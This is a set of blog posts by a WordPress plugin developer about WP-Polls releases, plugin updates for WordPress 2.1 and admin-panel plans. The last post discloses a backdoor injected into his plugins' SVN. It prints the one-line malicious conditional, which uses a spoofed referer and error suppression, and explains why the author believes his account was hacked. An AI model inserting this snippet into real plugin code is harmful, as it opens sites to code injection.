WP-Polls 2.20 Beta 1 Test

WP-Polls 2.20 Beta 1 is out the door. As usual, please do not run it on a live site as it is still in a beta stage. There are A LOT of changes between WP-Polls 2.14 and WP-Polls 2.20. 2 major ones are the implementation of polls that allow users to choose multiple answers and AJAX used in the administration panel.

I will try to capture screenshots for all of my plugins when I have the time to do so in addition to the live demo mainly because the administration panel cannot be shown. WP-Polls is the first plugin to get screenshoted.

Screenshots: http://www.lesterchan.net/wordpress/screenshots/browse/wp-polls/

WP-Polls 2.20 RC 1 has been released.

If you downloaded it, please feedback to me via the Support Forums or by email.

Thank You.

UPDATE:
Support forums: http://forums.lesterchan.net
Make sure you are using WordPress 2.1 and NOT WordPress 2.0.x

1 Star2 Stars3 Stars4 Stars5 Stars (75 votes, average: 3.72 out of 5)

WordPress 2.1 RC 1

I have updated this site to WordPress 2.1 RC1. The good news is I updated some of my plugins to make use of the “technology” of WordPress 2.1 but the bad news is that it is not backward compatible (I am too lazy/busy to make it backward compatible). I will release them when WordPress 2.1 goes gold.

Updated Plugins For WP 2.1:
» WP-Ban 1.10
» WP-DBManager 2.10
» WP-PageNavi 2.10
» WP-Polls 2.14
» WP-PostRatings 1.10
» WP-PostViews 1.10
» WP-RelativeDate 1.10
» WP-Stats 2.10
» WP-UserOnline 2.10
» WP-ServerInfo 1.00 (New Plugin – Display Your Host’s Server PHP and MYSQL Information On Your Dashboard)

Current Plugins That Will Work With WP 2.1:
» WP-EMail 2.07
» WP-Print 2.06

Plugins Not Tested With WP 2.1:
» WP-WAP 2.00

WP-DBManager and WP-ServerInfo cannot work side by side due function name conflicts, I will update WP-DBManager ASAP and also to make it work with WP 2.1 if it doesn’t

EDIT: WP-DBManager will be updated to 2.10

1 Star2 Stars3 Stars4 Stars5 Stars (69 votes, average: 3.72 out of 5)

WP-Polls Administration Panel Update

I think it is time for me to update WP-Polls Administration Panel as the code hasn’t been change much since WordPress 1.5.2.

Things I have in mind:
» AJAX used for almost everything with the exception of Adding/Editing Poll and Uninstallation Of WP-Polls
» Adding Poll will have its own tab rather than in Manage Poll Tab
» Uninstall Poll will also have its own tab rather than in Manage Poll Tab

The deleting of polls under the Manage Poll Tab will be something like when you delete WordPress categories, those fanciful fading will be included =)

1 Star2 Stars3 Stars4 Stars5 Stars (68 votes, average: 3.72 out of 5)

Code Injection Follow Up

I have release 2 security updates to WP-Polls and WP-PostRatings which basically removes a malicious code that allows code injection.

The malicious code is as follows:

if ($_SERVER['PHP_SELF'] == @links_add_base_url("/", $_SERVER['HTTP_REFERER']))
return;

The code itself does nothing, but hackers are spoofing the $_SERVER['HTTP_REFERER'] that allows arbitrary code injection and note the @ sign which surpress all errors and hence the error will not be displayed.

I am 100% sure based on the points below that the code was not added by me. I am beginning to believe that my account was hacked.

  • Personally, I have no idea what links_add_base_url() does and hence it is impossible for me to place it in my own plugin code.
  • I checked the commit date for the changeset of WP-PostRatings and the date/time is 11/04/10 22:10:13. Since I am on the GMT+8 zone, it is 6am for me. I do not wake up at 6am just to update my plugin.
  • The above changeset is for trunk. However in my readme.txt, I have state that the stable tag is 1.50 and hence the file is copied to /tags/1.50/ in this changeset, but if you note the time, it is 11/05/10 00:52:39. This is almost 3 hours after the trunk commit and it is almost 9am on my timezone and I will be in my office and my office’s computer does not have SVN copies of my plugin. So it is also not possible for me to commit that file
  • If you notice the same changeset, the file is being copied from trunk to tags/1.50 by SVN copy. I do not do a SVN copy for my plugins, normally I will just copy and paste the files using my Windows Explorer.
  • For WP-Polls, there is only 1 changeset as my stable tag is from trunk and the timestamp is 11/05/10 12:30:07. This is about 12 hours after the changeset of WP-PostRatings. On my timezone it is about 8.30pm and it is not possible for me to check-in because 8pm to 9pm is my dinner time and I always eat out.
  • For WP-WAP, there is almost 2 suspicious commit, here and here. As I do not develop WP-Wap anymore, there is no reason for me to commit something to it

I am going to review all my commits to the SVN to ensure that there are no more suspicious code being added.

1 Star2 Stars3 Stars4 Stars5 Stars (94 votes, average: 3.71 out of 5)